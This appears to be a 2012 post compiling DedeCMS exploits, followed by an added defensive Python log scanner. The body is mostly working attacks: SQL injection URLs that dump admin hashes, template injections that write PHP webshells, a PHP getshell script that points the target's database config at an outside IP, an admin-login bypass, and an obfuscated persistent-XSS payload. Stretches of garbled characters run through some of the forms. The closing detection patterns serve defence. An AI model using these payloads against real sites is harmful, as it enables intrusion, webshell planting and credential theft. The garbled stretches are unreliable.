DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14
Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
Generates x.php with password xiao; this directly creates a one-liner shell.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; from then on, visiting any of the URLs below in any way triggers our XSS.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n";
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n";
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

The precondition for this vulnerability is that the backend path must be known first.



Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below, and the shell is 1.php in the same directory. Work out the principle yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>


Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member backend, publish an article and upload an image; then in attachment management replace the image with our carefully constructed template, for example an image named:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(constructed here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have successfully changed the template path. 3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

4 ]+ S: l" n$ B0 O$ W) |+ B! ]
% R6 g( Y( ^! W( Z1 n<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 3 n/ `, e" Y( @& m8 d7 \
<input type="hidden" name="dopost" value="save" />
% }; F" b0 Z3 I* K<input type="hidden" name="aid" value="2" />
' S* O2 D5 ?7 a$ @<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
% d4 [6 R( S3 n( O<input type="hidden" name="channelid" value="1" />
4 e% N& J4 U7 E; j2 O<input type="hidden" name="oldlitpic" value="" /> ( E/ v1 g' q  a; i3 p" p
<input type="hidden" name="sortrank" value="1282049150" /> , ^/ r7 x4 m7 u' k
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 8 B" C- a( z- Y. T3 |; R, h5 _& r
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 6 T9 Q1 i% ^7 K8 J. T
<select name='typeid' size='1'> / M9 C# o3 q! y) E% P
<option value='1' class='option3' selected=''>Test</option>
, `0 P3 _, G: W7 y; d4 X  @: F<select name='mtypesid' size='1'> 6 H  Q! s; Z+ F% y
<option value='0' selected>请选择分类...</option>
' c# e' }2 `. u( r* }<option value='1' class='option3' selected>aa</option></select> + j2 ^( D" A9 n2 {2 O- T# Q
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ( x4 _& C9 v: @( F/ z& @
<input type='hidden' name='dede_addonfields' value="templet">
4 d* d& u5 ~) G% G& W3 d* t; P$ A<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 3 p; I) z# c! R' j/ n% a
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
1 [0 [6 x6 q. y4 d8 {; g<button class="button2" type="submit">提交</button>
* e) Y$ Y: B( u; i5 `6 x+ H</form>- k, ^/ ]8 Z$ b2 N' i  p8 j  W
织梦 (Dedecms) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 characters and the last 7 characters removed, which gives the 20-character MD5 password; the method is then to remove 3 from the front and 1 from the end, which gives the 16-character MD5.


织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='


织梦 (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, together with DEDECMS recording database error messages in a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the information from step 2 means the trojan file was uploaded successfully.

# H3 s7 |  _6 w
+ b% F- L5 `, M" I  O1 A! n% K& B! M# F# Z$ _$ G
+ r; Z% i  ]" @& D: I( ~
# R: {* {: F  c4 F6 t0 V' Q

$ B( K& y8 Q( R$ E5 E+ T* |
$ S3 H, w# C% S2 `' d! n
5 T" K+ ]1 X" u, B) M& d% W( X- s* F. o6 Q% V' B, J/ b
( v' S+ U3 l5 m3 ?! Q

4 y5 U. U$ J1 n  K# d
# x; ?; ]: d: j, K! n7 E3 L9 E$ }3 k" M, t% \; m! g4 B2 Z, r" Q
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
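For the defender reviewing a DedeCMS site, the request patterns collected in this post reduce to a handful of signatures: configuration variables supplied through `_COOKIE[GLOBALS]`/`_POST[GLOBALS]`, `{dede:...}` template tags arriving in user data, a raw `sql=` parameter or `updatexml(` in a query string, `../` in file-name parameters such as `oldface=` and `templet=`, `<script>` or `eval(` reflected through `gotopage=`/`mid=`, and direct fetches of `/data/mysql_error_trace.php`. The following log-review helper is an added example, not code from this post or from DedeCMS itself; the lines in `SAMPLE_LOG` are constructed, and the rule names and the set of parameters they cover are my assumptions about what a reviewer or WAF rule would look for.

```python
"""Log-review helper for the DedeCMS request patterns collected in this post.

Added example, not code from the post or from DedeCMS. SAMPLE_LOG holds
constructed combined-format access log lines; the rule set is an assumption
about what a reviewer or WAF rule would look for.
"""
import re
from urllib.parse import unquote_plus

# Request field of a combined-format access log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# DedeCMS template tags ({dede:php}, {dede:field ... runphp='yes'}, {/dede:link})
TEMPLATE_TAG_RE = re.compile(r"\{/?dede:[^}]*\}", re.I)

# Each rule is matched against the fully URL-decoded request target.
RULES = [
    # _COOKIE[GLOBALS][cfg_dbhost]= / _POST[GLOBALS]...: configuration values
    # supplied by the request (the variable-overwrite issues above)
    ("globals-override", re.compile(
        r"_(COOKIE|POST|GET|SESSION|SERVER|REQUEST)\[GLOBALS\]"
        r"|\bcfg_(dbhost|dbuser|dbpwd|dbname|dbprefix|basedir"
        r"|imgtype|softtype|mediatype)\b", re.I)),
    # template tags arriving in request data
    ("template-tag", TEMPLATE_TAG_RE),
    # sql= parameter (advancedsearch.php), SELECT ... FROM, updatexml( (rss.php)
    ("raw-sql", re.compile(
        r"[?&]sql=|\bselect\b.*\bfrom\b|\bupdatexml\s*\(", re.I | re.S)),
    # ../ in file-name parameters (oldface=, code=, templet=)
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    # <script>, PHP open tag or eval( in a parameter (gotopage=, mid=)
    ("script-injection", re.compile(r"<\s*script\b|<\?php|\beval\s*\(", re.I)),
    # direct fetch of the error-trace file that digg_frame.php errors are written to
    ("error-trace-file", re.compile(r"/data/mysql_error_trace\.php", re.I)),
]

# Constructed sample lines (10.0.0.0/8 and 203.0.113.0/24 are test ranges, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php'
    '?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512',
    '10.0.0.6 - - [18/Oct/2012:10:42:15 +0800] "GET /plus/mytag_js.php'
    '?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 200 77',
    '10.0.0.7 - - [18/Oct/2012:10:42:16 +0800] "GET /member/edit_face.php'
    '?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0',
    '10.0.0.8 - - [18/Oct/2012:10:42:17 +0800] "GET /dede/login.php'
    '?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3011',
    '10.0.0.9 - - [18/Oct/2012:10:42:18 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 8000',
    '10.0.0.10 - - [18/Oct/2012:10:42:19 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 312',
]


def fully_decode(text, rounds=3):
    """Undo repeated URL encoding so a double-encoded %255B still ends up as '['."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_request(log_line):
    """Return the names of the rules the request in this log line matches."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = fully_decode(m.group("target"))
    return [name for name, rx in RULES if rx.search(target)]


def scan_log(lines):
    """Return (client_ip, findings) for every line that matches at least one rule."""
    hits = []
    for line in lines:
        findings = classify_request(line)
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


def contains_template_tag(user_input):
    """Input check for stored fields (e.g. the software 'local address' field):
    reject values carrying a DedeCMS template tag before they reach the parser."""
    return TEMPLATE_TAG_RE.search(user_input) is not None


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(findings))
```

Decoding the target repeatedly before matching matters: the PHP script above sends `_COOKIE%5BGLOBALS%5D`, and a rule that looks only for the literal `[GLOBALS]` would miss it. `contains_template_tag` is the server-side counterpart for the stored-content cases (software "local address", uploaded template files): the tag parser should never see `{dede:` text that a member typed in.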